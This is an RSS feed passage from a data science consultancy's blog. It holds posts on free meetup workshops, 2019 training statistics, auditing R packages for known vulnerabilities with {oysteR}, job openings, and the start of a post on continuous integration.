&lt;p&gt;All webinars will be streamed on &lt;a href="https://www.youtube.com/c/WhyRFoundationVideos" rel="external"&gt;WhyR&amp;rsquo;s YouTube&lt;/a&gt; page.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-r-partnership/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Free Workshops for Meetup Groups</title><link>https://www.jumpingrivers.com/blog/free-workshops-for-meetup-groups/</link><pubDate>Fri, 16 Oct 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/free-workshops-for-meetup-groups/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/free-workshops-for-meetup-groups/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/free-workshops-for-meetup-groups/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;For the last few years we’ve offered &lt;a href="https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/" rel="external" title="automatic sponsorship"&gt;automatic sponsorship&lt;/a&gt; for meet-ups and satRday events. However, for obvious COVID-related reasons, most (all?) meet-ups have been getting together virtually, so the need for extra pizza money has diminished.&lt;/p&gt;
&lt;p&gt;As with most organisations, we’ve had to adapt to the new online-first environment, in particular by running primarily &lt;a href="https://www.jumpingrivers.com/blog/online-r-python-git-training/" rel="external" title="online training courses"&gt;online training courses&lt;/a&gt;. We’ve always run &lt;em&gt;some&lt;/em&gt; online events, but now we’re running in excess of ten days of training per month on topics including R, Python, Git, Shiny and Stan. So far our average course rating is a healthy 4.7 out of 5!&lt;/p&gt;
&lt;p&gt;With this newfound experience in online training, and our regret at not getting to interact with useR groups from around the world, we thought that one way we could contribute back to the community would be to offer free training workshops.&lt;/p&gt;
&lt;p&gt;Potential topics fall into two groups. Introductory sessions, where the background would be kept to a minimum, e.g.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;starting out with the tidyverse&lt;/li&gt;
&lt;li&gt;Rmarkdown&lt;/li&gt;
&lt;li&gt;basic git&lt;/li&gt;
&lt;li&gt;building an R package&lt;/li&gt;
&lt;li&gt;regular expressions&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Or more advanced topics that would require some pre-requisites&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;getting started with Shiny&lt;/li&gt;
&lt;li&gt;continuous integration&lt;/li&gt;
&lt;li&gt;advanced git topics, e.g. rebase vs merge&lt;/li&gt;
&lt;li&gt;anything else?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested, then please complete this short &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;form&lt;/a&gt; and we’ll get in touch.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/free-workshops-for-meetup-groups/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The (Delayed) 2019 Training Review</title><link>https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/</link><pubDate>Tue, 13 Oct 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/original.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Don’t we all miss 2019? (Blame Covid for the long delay in this post.) The days of going to work and seeing your work colleagues face to face - and for some of you, attending one of our on-site training courses! 2019 was a great year for us. Not only did we break new boundaries, we also recruited new full-time staff who have further contributed to the glowing success of the company. The new staff who joined &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; in 2019 are as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Deborah Washington, Project Operation Manager&lt;/li&gt;
&lt;li&gt;Anmol Hussain, Finance Officer&lt;/li&gt;
&lt;li&gt;Dr Rhian Davies, Data Scientist&lt;/li&gt;
&lt;li&gt;John McIntyre, Data Scientist&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You might be wondering what &lt;strong&gt;EXACTLY&lt;/strong&gt; 2019 brought for Jumping Rivers. Some interesting data that we collected on the training courses we delivered can be seen below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Total number of training course attendees was &lt;strong&gt;1192&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Total number of R training course attendees was &lt;strong&gt;1070&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Total number of Python training course attendees was &lt;strong&gt;182&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Total number of Stan / Scala training course attendees was &lt;strong&gt;101&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Over &lt;strong&gt;100&lt;/strong&gt; courses were delivered&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To provide a visual representation of how the year went, here are some neat plots I have created using the {ggplot2} R package.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-the-delayed-2019-training-review"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="average-attendees-per-language"&gt;Average attendees per language&lt;/h2&gt;
&lt;img class="image-center" src="attendees_language.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;From the graph above, it can be seen that the average number of Python attendees per course was higher than the number of R attendees per course. For courses, we typically cap the class size at around 12 to 15 people. We sometimes run larger courses, but then there would be multiple trainers onsite. Stan and Scala courses typically have much smaller class sizes, usually around eight people. This reflects the additional complexity of the programming and statistics involved.&lt;/p&gt;
&lt;h2 id="course-length"&gt;Course length&lt;/h2&gt;
&lt;img class="image-center" src="course_length.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;An interesting observation I have made from the graph above is that two-day courses seem more popular from a Python perspective. Conversely, even though two-day courses are popular in R as well, regular one-day courses seem to be the most prominent approach our clients take when learning R.&lt;/p&gt;
&lt;h2 id="r-training-courses"&gt;R training courses&lt;/h2&gt;
&lt;img class="image-center" src="r_courses.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;A very interesting area of my analysis centered around the type of R courses we deliver at Jumping Rivers. We offer courses in three main sectors - analytics, graphics and programming. The bar chart seen above gives us a great indication as to the courses that are most popular with our budding R enthusiasts! We offer introductory and more advanced level programming courses, likewise with our tidyverse courses that include &lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;, &lt;a href="https://www.jumpingrivers.com/training/course/r-tidyverse-programming-purrr-lists/"&gt;Functional Programming with {purrr}&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/r-text-mining-tidyverse-stringr-tidytext/" rel="external"&gt;Text Mining in R&lt;/a&gt;. If you wish to delve deeper into the courses that we offer and want a detailed guide as to what material is covered, go check out &lt;a href="https://www.jumpingrivers.com/training/all-courses/"&gt;our website&lt;/a&gt;! You will see that in addition to R and Python, we also offer courses in &lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan/" title="Stan"&gt;Stan&lt;/a&gt;, Scala and SQL. We have also recently introduced a new version control &lt;a href="https://www.jumpingrivers.com/training/course/intro-to-git/" title="Git course"&gt;Git course&lt;/a&gt;!&lt;/p&gt;
&lt;h2 id="shall-we-let-the-team-have-their-moment---yeah-why-not"&gt;Shall we let the team have their moment - yeah, why not?&lt;/h2&gt;
&lt;p&gt;A crucial aspect of Jumping Rivers is the team we have here. Each and every person does their job to grow the company and maintain the high standards we have placed on ourselves. Whether it be waking up early to catch a train to deliver a training course, or sitting on our laptops rigorously writing code day after day, we all go the extra mile to meet the needs of our clients and course attendees.&lt;/p&gt;
&lt;p&gt;The bar chart below illustrates the number of courses run by each presenter in 2019. For the sake of a more accurate depiction, it is worth noting that Rhian and I (John) joined the company in mid and late 2019, respectively.&lt;/p&gt;
&lt;img class="image-center" src="number_courses.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;The race was tightly contested in terms of the number of courses taught, with Jamie pipping Theo at the final bend!&lt;/p&gt;
&lt;img class="image-center" src="total_attendees.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;Last but not least and in my opinion, the most important of all, is the number of attendees taught. Speaking on behalf of my colleagues and myself, knowing that you have aided the progression of individuals in their understanding of the new, cutting edge programming languages, is hugely rewarding. Jamie wins this one as well so on that note, I pronounce you, Lord Owen (who really hates this post)!&lt;/p&gt;
&lt;img class="image-center" src="jamie.jpeg" style="width:250px; class:image-center"&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Detecting Security Vulnerabilities in R Packages</title><link>https://www.jumpingrivers.com/blog/r-package-vulnerabilities-security/</link><pubDate>Fri, 28 Aug 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-package-vulnerabilities-security/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-package-vulnerabilities-security/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-package-vulnerabilities-security/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;One of our main roles at &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; is to set up and provide ongoing maintenance for R, Python and RStudio &lt;a href="https://www.jumpingrivers.com/posit/" rel="external"&gt;infrastructure&lt;/a&gt;. This typically involves ensuring software is up-to-date and making sure everything is running smoothly.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://ossindex.sonatype.org/" rel="external"&gt;OSS Index&lt;/a&gt; developed by Sonatype is a&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;free catalogue of open source components and scanning tools to help developers identify vulnerabilities, understand risk, and keep their software safe.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The &lt;a href="https://github.com/sonatype-nexus-community/oysteR" rel="external"&gt;{oysteR}&lt;/a&gt; package is an R interface to the OSS Index that allows users to scan their installed R packages. A few months ago, I stumbled across a fledgeling version of this package and decided to make a few contributions to help move the package from GitHub to CRAN. A few PRs later, I&amp;rsquo;m now a co-author and the package is on CRAN.&lt;/p&gt;
&lt;p&gt;Installing the &lt;code&gt;{oysteR}&lt;/code&gt; package is straightforward, just the usual &lt;code&gt;install.packages()&lt;/code&gt; dance:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;oysteR&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After loading the package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;oysteR&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can audit the installed R packages for security vulnerabilities via the command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;audit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;audit_deps&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Which produces the output&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ Calling installed.packages(), this may take time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ── Calling sonatype API: https://www.sonatype.com/ ──&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# → Using Sonatype tokens&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ Calling API: batch 1 of 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ Calling API: batch 2 of 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ── Vulnerability overview ──&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ 218 packages were scanned&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ 190 packages were in the Sonatype database&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ 1 package contains known vulnerability&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ A total of 1 known vulnerability was identified&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As the output suggests, this function performs a few steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Calls &lt;code&gt;installed.packages()&lt;/code&gt; to determine the installed packages on your machine. Although there are warnings about this taking a &lt;em&gt;little while&lt;/em&gt;, I’ve never had any issues.&lt;/li&gt;
&lt;li&gt;Splits the packages into batches of 128 and queries the Sonatype API. Note, I’ve registered for Sonatype to allow more API calls. This isn’t strictly necessary, but registering increases the number of API calls you can make - see the GitHub &lt;a href="https://github.com/sonatype-nexus-community/oysteR" rel="external"&gt;README&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Summarises the results. In the output above, a total of 218 packages were scanned, 190 were found in the Sonatype database, and a single vulnerability was identified.&lt;/li&gt;
&lt;/ol&gt;
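&lt;p&gt;The batching in step 2 can be sketched in a few lines of base R. This is an illustration only, not the code {oysteR} uses internally: the package names and versions below are made up, and the &lt;code&gt;pkg:cran/name@version&lt;/code&gt; coordinate format is assumed from the form of OSS Index component links.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical package table; in practice this would come from installed.packages()
pkgs = data.frame(
  package = paste0(&amp;#34;pkg&amp;#34;, 1:218),
  version = &amp;#34;1.0.0&amp;#34;
)

# Build one coordinate per package (assumed format: pkg:cran/name@version)
purls = paste0(&amp;#34;pkg:cran/&amp;#34;, pkgs$package, &amp;#34;@&amp;#34;, pkgs$version)

# Split the coordinates into batches of at most 128
batch_size = 128
batches = split(purls, ceiling(seq_along(purls) / batch_size))

length(batches)   # 2 batches for 218 packages
lengths(batches)  # 128 in the first batch, 90 in the second
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With 218 packages this gives two batches, which matches the &amp;ldquo;batch 1 of 2&amp;rdquo; and &amp;ldquo;batch 2 of 2&amp;rdquo; messages in the output above.&lt;/p&gt;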
&lt;p&gt;Packages might not be on Sonatype for a variety of reasons. For example, you may have personal packages. In my case, I have a large number of Jumping Rivers &lt;a href="https://www.jumpingrivers.com/courses" rel="external"&gt;teaching related packages&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The million-pound question is, what is the vulnerability? To obtain a few more results, we can use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_vulnerabilities&lt;/span&gt;(audit)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which returns a tibble giving further details. In our case, the vulnerable package is&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://github.com/bhaskarvk/widgetframe" rel="external"&gt;{widgetframe}&lt;/a&gt;, version 0.3.1 (the current latest version)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;After consulting the &lt;a href="https://ossindex.sonatype.org/component/pkg:cran/widgetframe@0.3.1" rel="external"&gt;link provided&lt;/a&gt; by &lt;code&gt;get_vulnerabilities()&lt;/code&gt;, we see that the issue&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;was originally highlighted by &lt;a href="https://rud.is/b/2018/02/16/pym-js-library-vulnerability-in-widgetframe-package/" rel="external"&gt;Bob Rudis&lt;/a&gt; in 2018&lt;/li&gt;
&lt;li&gt;concerns “Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)”, which is basically not sanitising URLs&lt;/li&gt;
&lt;li&gt;the underlying Javascript package has been &lt;a href="https://github.com/bhaskarvk/widgetframe/pull/13" rel="external"&gt;updated&lt;/a&gt; thanks to a PR from Bob.&lt;/li&gt;
&lt;li&gt;but the R package is &lt;em&gt;still&lt;/em&gt; using the old package.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-package-vulnerabilities-security"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="vulnerabilities-in-r"&gt;Vulnerabilities in R&lt;/h3&gt;
&lt;p&gt;Right now the few vulnerabilities that have been detected within R packages typically involve a Javascript library that has been included. However, it would be a bit hopeful to assume these are the only vulnerabilities around. To paraphrase Donald Trump, “if we don’t look, then we won’t find,” so it is likely that security issues exist in other packages that contain other code, e.g. C++. As R gets more popular, I suspect that it will receive more and more attention from people with nefarious intentions. Particularly, as we push dashboards and documents to the web.&lt;/p&gt;
&lt;h3 id="summary"&gt;Summary&lt;/h3&gt;
&lt;p&gt;Including Javascript is amazingly easy - see this recent great &lt;a href="https://blog.r-hub.io/2020/08/25/js-r/" rel="external"&gt;blogpost&lt;/a&gt; from Maëlle Salmon and Garrick Aden-Buie for an excellent discussion. However, when we bundle external code within our package, we now need to ensure that we update the package at regular intervals. This brings a few challenges:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;for package authors, we need to ensure that our packages are updated regularly. If we decide to stop updating, that’s OK, but we need to let the users know.&lt;/li&gt;
&lt;li&gt;for CRAN. Currently, there is no mechanism to remove potentially dangerous packages - but this is the trade-off we have for not breaking builds.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ultimately the final responsibility lies with users (or their organisations), who need to take responsibility for the packages they use.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-package-vulnerabilities-security/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Job Opportunities: Data Scientist and Engineer</title><link>https://www.jumpingrivers.com/blog/job-opportunities-data-scientist-and-engineer/</link><pubDate>Fri, 14 Aug 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/job-opportunities-data-scientist-and-engineer/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/job-opportunities-data-scientist-and-engineer/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/job-opportunities-data-scientist-and-engineer/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; is a data science consultancy company focused on R and Python. We work across industries and throughout the world. We offer a mixture of training, modelling, and infrastructure support. Jumping Rivers is an &lt;a href="https://www.jumpingrivers.com/rstudio-full-service-certified-partner/" rel="external"&gt;RStudio Full Service Certified Partner&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location:&lt;/strong&gt; We are based in &lt;a href="https://en.wikipedia.org/wiki/Newcastle_upon_Tyne" rel="external" title="Newcastle upon Tyne"&gt;Newcastle upon Tyne&lt;/a&gt;. However, since the creation of the company we have encouraged remote working. Half of the team are remote (Leeds, Lancaster, Edinburgh). To make remote working a possibility, you need a) a good internet connection and b) to be within a few hours of (train) travel to London or Edinburgh.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Deadline&lt;/strong&gt;: 31st August, 2020&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-job-opportunities-data-scientist-and-engineer"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="role-1-data-engineer"&gt;Role 1: Data Engineer&lt;/h2&gt;
&lt;p&gt;This role is suitable for anyone interested in deploying (Linux-based) data science services and contains two main elements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Client facing:&lt;/strong&gt; assess virtual servers &amp;amp; services. Identify potential issues or improvements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Internal:&lt;/strong&gt; Everyone(!) at Jumping Rivers uses Linux. Provide support on setting-up systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Depending on the interests of the applicant, getting involved with &lt;em&gt;training&lt;/em&gt; is also a possibility.&lt;/p&gt;
&lt;h3 id="essential-technical-requirements"&gt;Essential technical requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Linux server administration&lt;/li&gt;
&lt;li&gt;Shell scripting&lt;/li&gt;
&lt;li&gt;Version control&lt;/li&gt;
&lt;li&gt;Relevant technical degree or equivalent experience (Sciences, server administration)&lt;/li&gt;
&lt;li&gt;Some experience in R&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="desirable-but-not-essential"&gt;Desirable (but not essential)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Experience with Python, HTML/CSS/JS&lt;/li&gt;
&lt;li&gt;Experience with static site generators&lt;/li&gt;
&lt;li&gt;Docker stack deployment (e.g., Docker Compose, Terraform, Packer)&lt;/li&gt;
&lt;li&gt;Continuous Integration and Deployment (e.g., GitLab CI, Travis)&lt;/li&gt;
&lt;li&gt;Authentication services (e.g., Active Directory, SAML, LDAP, OAuth)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="future-role-opportunities"&gt;Future role opportunities&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Opportunity to develop new orchestration and deployment pipelines for use in Artificial Intelligence and Machine Learning workloads.&lt;/li&gt;
&lt;li&gt;Maintaining remote Linux services both cloud-based and internal VPS&lt;/li&gt;
&lt;li&gt;Designing bespoke infrastructure solutions for clients&lt;/li&gt;
&lt;li&gt;Training: develop and deliver courses&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To discuss this role, please email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt;. To apply, please send a short covering letter and CV. Please use &amp;ldquo;Data Engineer&amp;rdquo; as the subject.&lt;/p&gt;
&lt;h2 id="role-2-data-scientist"&gt;Role 2: Data Scientist&lt;/h2&gt;
&lt;p&gt;Technical duties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Building web applications using R and Shiny&lt;/li&gt;
&lt;li&gt;Data analysis using R and/or Python&lt;/li&gt;
&lt;li&gt;Development of bespoke statistical algorithms&lt;/li&gt;
&lt;li&gt;Provide technical training&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Client contact:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attend on-site client meetings (at some point in the future)&lt;/li&gt;
&lt;li&gt;Off-site meetings via video conference call&lt;/li&gt;
&lt;li&gt;Training on site (at some point in the future)&lt;/li&gt;
&lt;li&gt;Develop a plan of action for consultancy.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="essential-technical-requirements-1"&gt;Essential technical requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Basic Shiny experience (your first interview question will be &amp;ldquo;show me a recent Shiny App&amp;rdquo;)&lt;/li&gt;
&lt;li&gt;Experience with the tidyverse&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="desirable-but-not-essential-1"&gt;Desirable (but not essential)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Knowledge of statistical and/or machine learning algorithms&lt;/li&gt;
&lt;li&gt;Experience with Python, HTML/CSS/JS&lt;/li&gt;
&lt;li&gt;git&lt;/li&gt;
&lt;li&gt;Linux experience&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To discuss this role, please email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt; . To apply, please send a short covering letter and CV. Please use &amp;ldquo;Data Scientist&amp;rdquo; as the subject.&lt;/p&gt;
&lt;h2 id="role-3-data-scientist-with-an-emphasis-on-training"&gt;Role 3: Data Scientist with an emphasis on training&lt;/h2&gt;
&lt;p&gt;Similar to Role 2, but with a stronger emphasis on training.&lt;/p&gt;
&lt;p&gt;To discuss this role, please email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt; . To apply, please send a short covering letter and CV. Please use &amp;ldquo;Data Scientist with training&amp;rdquo; as the subject.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/job-opportunities-data-scientist-and-engineer/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Speeding up your Continuous Integration Builds</title><link>https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/</link><pubDate>Thu, 25 Jun 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Continuous integration is an amazing tool when developing R packages. We push a change to the server, and a process is spawned that checks we haven’t done something silly. It protects us from ourselves! However this process can become slow, as typically the CI process starts with a blank virtual machine (VM).&lt;/p&gt;
